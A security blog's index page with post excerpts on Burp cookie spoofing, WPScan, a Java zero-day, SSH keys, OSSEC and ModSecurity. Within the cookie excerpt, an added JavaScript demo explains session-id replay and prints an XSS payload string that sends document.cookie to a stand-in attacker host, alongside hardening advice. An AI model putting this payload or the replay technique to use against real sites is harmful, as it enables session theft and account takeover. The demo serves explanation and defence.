Spoofing an Admin’s Cookies Using Burp

Spoofing Cookies

Here is a quick little video I put together to show you how spoofing a user’s cookies works. This is not a real example; in most instances a tool like Burp Suite would be used in conjunction with an XSS attack or some equivalent attack. The objective is to get someone with higher privileges to…
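To make the mechanism concrete, here is an added illustration (not code from the post or the video) of why a replayed cookie works: the server identifies the caller only by the session id carried in the Cookie header, so a request whose header has been edited in Burp to carry the admin's id is indistinguishable from the admin's own request. The session store, the cookie name `sid`, the session ids and the two request headers are all constructed for the demo.

```javascript
// Added example: a minimal cookie-based session check of the kind a
// Burp user would target. Everything below (store, ids, cookie name)
// is a constructed assumption, not the post's own code.

// Constructed server-side session store: session id -> principal.
const SESSIONS = new Map([
  ["3d7f9c1e2b4a", { user: "alice", role: "admin" }], // the admin's live session
  ["a8c4e6f0b2d1", { user: "bob", role: "user" }],    // the attacker's own session
]);

// Parse a raw Cookie request header ("a=1; b=2") into a name -> value map.
function parseCookieHeader(header) {
  const out = {};
  for (const part of (header || "").split(";")) {
    const idx = part.indexOf("=");
    if (idx < 0) continue;
    const name = part.slice(0, idx).trim();
    const value = part.slice(idx + 1).trim(); // values may themselves contain '='
    if (name) out[name] = value;
  }
  return out;
}

// What the application does on every request. The only thing it knows
// about the caller is the session id in the Cookie header: whoever
// presents the admin's id *is* the admin as far as the server can tell.
function authorize(cookieHeader) {
  const { sid } = parseCookieHeader(cookieHeader);
  const session = sid ? SESSIONS.get(sid) : undefined;
  return session ? { ...session } : { user: null, role: "anonymous" };
}

// The attacker's legitimate request header...
const attackerRequest = "sid=a8c4e6f0b2d1; theme=dark";
// ...and the same request after swapping the sid in Burp's Proxy/Repeater
// for the value exfiltrated from the admin (e.g. via XSS).
const spoofedRequest = "sid=3d7f9c1e2b4a; theme=dark";

// The kind of injected script the XSS half of the attack would carry
// (shown as a string, never executed here): it only works when the
// cookie is readable from document.cookie, i.e. was set without HttpOnly.
const exfilPayload =
  'new Image().src = "https://attacker.example/c?" + encodeURIComponent(document.cookie);';

// The Set-Cookie the app should emit instead: HttpOnly keeps the id out
// of document.cookie, Secure and SameSite limit other leakage. This closes
// the XSS exfiltration path but does NOT stop replay of an id stolen some
// other way; for that the server would have to rotate/bind the session.
function sessionCookie(sid) {
  return `sid=${sid}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

function hasHttpOnly(setCookieValue) {
  return /;\s*HttpOnly\b/i.test(setCookieValue);
}

// Stand-alone demo: the edited header is authorized as the admin.
console.log("attacker as sent :", authorize(attackerRequest));
console.log("attacker spoofed :", authorize(spoofedRequest));
console.log("hardened cookie  :", sessionCookie("a8c4e6f0b2d1"));
console.log("xss payload      :", exfilPayload);
```

The point to take from `authorize` is that nothing in the request ties the id to the browser that originally received it, which is exactly what makes the Burp header edit sufficient. `HttpOnly` removes the easy `document.cookie` route, not the replay itself.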

Update WPScan using Git on BackTrack 5 R2

Website Security Expertise

So I have been playing with a number of tools lately, and this was perhaps one of the easiest things I couldn’t figure out. Talk about having a “WTF” moment. If you’re curious, WPScan is a vulnerability scanner designed to pentest WordPress installations. It has a number of features that allow you to enumerate usernames, plugins, and…

Java Zero Day: Two Vulnerabilities

Security Warnings

Yesterday was an interesting one for the security world; it was abuzz over the new Java 0-day, and today is no different. It turns out, however, that it’s not just one (1) zero-day, it’s two, and they were introduced back in July of 2011. We shared our initial thoughts on the vulnerability yesterday. Today…

Accessing Your Server via SSH Keys

Access Granted

The past couple of weeks I have found myself dabbling in a number of system- and network-centric tasks. In the process I have been configuring a number of servers and thinking through the initial steps that need to be taken on each one. From time to time I find myself compelled to take a few…

My New OSSEC HIDS Book

Security Book

Pretty excited: today I got my very own copy of the OSSEC Host-Based Intrusion Detection (HIDS) Guide in the mail. If you haven’t heard of it, OSSEC was developed a few years back and was founded by Daniel Cid, our founder at Sucuri. Its core features include:

Uninstall ModSecurity & WordPress Challenges

Uninstall ModSecurity WordPress Challenges

Ok, as simple a post as this might appear, I recently undertook an effort to install and configure ModSecurity on my little server. In the process I quickly learned a number of things, specifically that I needed to uninstall it from my production box and push it over to a staging box. I’m not a…